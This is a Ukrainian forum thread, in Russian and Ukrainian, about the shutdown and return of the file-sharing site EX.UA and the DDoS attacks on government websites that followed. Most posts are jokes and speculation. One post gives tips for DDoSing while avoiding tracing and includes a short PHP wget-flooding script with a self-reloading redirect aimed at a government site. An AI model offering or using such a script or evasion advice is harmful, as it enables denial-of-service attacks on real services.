Перейти до публікації
Пошук в
  • Додатково...
Шукати результати, які містять...
Шукати результати в...

Закрыт EX.UA

Artyomovets

Рекомендовані повідомлення

и я не вижу смысла..:fool:

есть смысл когда конкурент валит комменческий сайт конкурента,

а здесь ситуация напоминает мальчика, который назло маме отморозил уши.

Мальчик растет... А вот мачеха, яйцом ударенная, все больше в истерику впадает...:fool:

Зы. И мальчик таки завалит КОММЕНЧЕСКИЙ сайт проФФесоров...

Посилання на коментар
Поділитися на інших сайтах

Ура!!!! Заработало!!!

 

Программы почистили неплохо, а в фильмах часто вместо "скачать" - "файл временно недоступен"...

Посилання на коментар
Поділитися на інших сайтах

Программы почистили неплохо, а в фильмах часто вместо "скачать" - "файл временно недоступен"...

Эт точно. Только не часто, а по крайней мере проверил 15-18 закладок с фильмами и аудиолекциями, которые не скачал везде написано "файл временно недоступен".

Будем надеяться на восстановление недоступных данных.

Посилання на коментар
Поділитися на інших сайтах

Так а чго вы ждали???

Уважаемые пользователи!

 

Часть информации временно недоступна.

Мы работаем над восстановлением полной работоспособности ресурса.

 

Спасибо всем,

Администрация ресурса.

 

На главной странице прямо сказано...

Посилання на коментар
Поділитися на інших сайтах

и я не вижу смысла..:fool:

есть смысл когда конкурент валит комменческий сайт конкурента,

а здесь ситуация напоминает мальчика, который назло маме отморозил уши.

 

эт -точно .

Ну ладно ещё когда школьники сидят сутками и забавляются , а тут же вродь и люди взрослые.:):o

Посилання на коментар
Поділитися на інших сайтах

Тем не менее домен уже разблокировали и с очень странным обоснованием. Так и читается между строк: извините, обосрались...

 

Не будьте наивными, сомневаюсь что атаки на сайты власти повлияли на решение о возврате домена для ЕХ.ЮА. Мне кажется все банально просто - занесли мешочек денег куда нада. Решается у нас в стране все.

Посилання на коментар
Поділитися на інших сайтах

Все IP-адреса, с которых проводятся блокировки сайта президента, переданы в правоохранительные органы, сообщили в пресс-службе Государственной службы специальной связи и защиты информации.

 

В ведомстве отметили, что с 6:00 1 февраля мониторинг за сайтами, находящимися на площадках Госспецсвязи, зафиксировал увеличение сетевой нагрузки на серверы официального сайта президента.

 

"Это было классифицировано как "Атака на отказ в обслуживании" (DDoS-атака)", - сказали в пресс-службе ведомства

 

По их данным, Национальная команда реагирования на чрезвычайные компьютерные происшествия CERT-UA установила местонахождение интернет-ресурса, на котором размещалось вредоносное программное обеспечение, и заблокировала его работу.

 

"К сожалению, атаки продолжаются. Максимальное количество запросов, направленных на отказ работы интернет-представительства, составляет приблизительно 140 тысяч запросов в секунду. IP-адреса, с которых проводятся атаки, переданы в правоохранительные органы", - отметили в ведомстве.

 

Обещают всех пересажать

Посилання на коментар
Поділитися на інших сайтах

демократия по-украински:

наркоманы атакуют аптеки, отказавшиеся продавать им шприцы и трамадол.

Посилання на коментар
Поділитися на інших сайтах

Реакция народа хорошо прослеживается по большому количеству анекдотов, мгновенно появившихся в нете:

 

 

«Из-за сильных морозов закрыли школы, детские сады и EX.UA»

 

«EX.UA закрыли по требованию Кремля: по некоторым сообщениям с помощью этого сайта украинцы бесплатно качали российский газ»:D

Посилання на коментар
Поділитися на інших сайтах

Заработал уже сайт. Жизнь налаживается.

а что, без ех.уа жизнь прекратилась? :D

Посилання на коментар
Поділитися на інших сайтах

Мой интрес к теме "посоветуйте хороших фильмов" был напрямую связан с работоспособностью еэкса... После его закрытия, тема потеряла для меня интерес...)
Посилання на коментар
Поділитися на інших сайтах

а что, без ех.уа жизнь прекратилась? :D

 

Вы только смотрите со своей колокольни. Эгоист, короче.

У кого-то в посёлках, сёлах, пригородах и других городах, кроме, Киева, жизнь временно прекратилась, так как забрали главную игрушку. А вообще почитайте админские форумы и тогда поймёте в чём проблема. Наверно..

Я понимаю, что есть масса других сайтов, но этот сайт был основным. Это как посадили Тимошенко об этом все говорят, а каждый день садят пачками людей, о них не говорят.

Посилання на коментар
Поділитися на інших сайтах

(ссылка устарела)

 

Неужели что бы достучаться до наших правителей,

нужно было просто заблокировать работу их сайтов.

Теперь будем знать.

Все набагато простіше - просто "отжали" бізнес. Коломойський придбав ex.ua і все одразу почало "налаживацца"

Рейдери.... банальні рейдери + державні-комерційні структури....

 

А вкладати не державні сайти треба було( це для демократичної країни), а комерційні СКМу ПП ПРИВАТу , плюсів.

А так дійсно перепіляють держ кошти і у МВС тепер буде не один сервер стояти, а цілий кластер, як то вже зроблено для президент гов юа.

ЗІ: І порада - дружня.... Не ддосьте з своїх персональних компів. Але якщо так кортить, то хочаб міняйте мак адресу і використовуйте закордонний проксі( це тільки для браузера, ) . Пінги ping .... вже давно неефективна зброя і їх легко "відрізати" від сервера.

Маєте закордонний хостінг - це добре :)

<?php

set_limit_time(0);

for($i=0;$i<1000;$i++){

exec("wget -w 10 -b http://pre...gov.ua");

//file_get_content("http://pre...gov.ua");

}

?><script>document.location.href='your.domain/this_page_name.php';</script>

 

І взагалі тримайте свої дані та проекти за межами UA :beer:

ЗІ ЗІ не інтернет-наркоман, але просто ЗАДОВБАЛИ!!! А на виході маємо теж лайно, що і у 2004 му :)

Посилання на коментар
Поділитися на інших сайтах

Вы только смотрите со своей колокольни. Эгоист, короче.

У кого-то в посёлках, сёлах, пригородах и других городах, кроме, Киева, жизнь временно прекратилась, так как забрали главную игрушку.

какой ужос, сейчас расплАчусь :sorry:

когда у наркомана дозу забирают это тоже ужасно :(

А вообще почитайте админские форумы и тогда поймёте в чём проблема. Наверно..

я не знаю, что такое админские форумы, может обьясните тезисно? я пойму, я умный

Я понимаю, что есть масса других сайтов, но этот сайт был основным. Это как посадили Тимошенко об этом все говорят, а каждый день садят пачками людей, о них не говорят.

почему то тема о скупке ворованых генераторов в соседнем разделе вызывает возмущение и бурю негодования, а тема о закрытие ресурса с пиратским контентом наоборот.

по сути то ведь одно и то же?

Посилання на коментар
Поділитися на інших сайтах

какой ужос, сейчас расплАчусь :sorry:

когда у наркомана дозу забирают это тоже ужасно :(

 

я не знаю, что такое админские форумы, может обьясните тезисно? я пойму, я умный

 

почему то тема о скупке ворованых генераторов в соседнем разделе вызывает возмущение и бурю негодования, а тема о закрытие ресурса с пиратским контентом наоборот.

по сути то ведь одно и то же?

 

Вы прям такой чесночок, аж диву даюсь. Не смешите. Если умный, то сами найдёте, вы же умный.

Посилання на коментар
Поділитися на інших сайтах

а там все до банального просто может быть:

пришлет следственный отдел информ безопасности сбу вонючку руководству пров-а, примерно такую:

с ай-пи адреса такого то , тогда то тогда то, делегированного за вашим провайдером была произвдена атака на правительственный сайт такой-то.

логи прилагаются, просим принять меры . в проитвном случае будет направлен запрос о лишении вашей компании лицензии..

итд итп.

 

и вот уже эта проблема становится проблемой првайдера.

Ну у провайдера два варианта:

- формально отписаться, что меры приняты;

- заблокировать IP-адрес пользователя и последнему придется сменить провайдера.

Какой из двух вариантов скорее всего выберет провайдер?

Посилання на коментар
Поділитися на інших сайтах

почему то тема о скупке ворованых генераторов в соседнем разделе вызывает возмущение и бурю негодования, а тема о закрытие ресурса с пиратским контентом наоборот.

по сути то ведь одно и то же?

Не думаю. С пиратским контентом бороться надо совсем по-другому. Есть жалоба правообладателя -контент удаляется с сайта. А так это все банальное рейдерство

Посилання на коментар
Поділитися на інших сайтах

думаю вместо того чтобы блокировать роботу сайтов которые хз кому нужны, лучше бы писали им на електронку письма с адресами и фото мест где торгую пиратскими дисками (переходы, рынки и тд), мож люди то не знают.......
Посилання на коментар
Поділитися на інших сайтах

(ссылка устарела)

it.siteua.org/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/335191/%D0%9A%D0%BE%D0%BB%D0%BE%D0%BC%D0%BE%D0%B9%D1%81%D0%BA%D0%B8%D0%B9_%D0%BD%D0%B5_%D0%BF%D0%BE%D0%BA%D1%83%D0%BF%D0%B0%D0%BB_EX_UA

Посилання на коментар
Поділитися на інших сайтах

О существовании этого сайта узнал только после того ,как поднялась шумиха о его закритии.

Смотреть современные фильмы , считаю бесполезной тратой времени.

Если честно , то и фильм "Спасибо что живой " не смотрел.

Скажите , я многое потерял ?

А то наблюдая как народ страдает , уже начал переживать , может чего важное на том сайте было.

  • Лайк 1
Посилання на коментар
Поділитися на інших сайтах

Створіть акаунт або увійдіть у нього для коментування

Ви маєте бути користувачем, щоб залишити коментар

Створити акаунт

Зареєструйтеся для отримання акаунта. Це просто!

Зареєструвати акаунт

Увійти

Вже зареєстровані? Увійдіть тут.

Увійти зараз
×
×
  • Створити...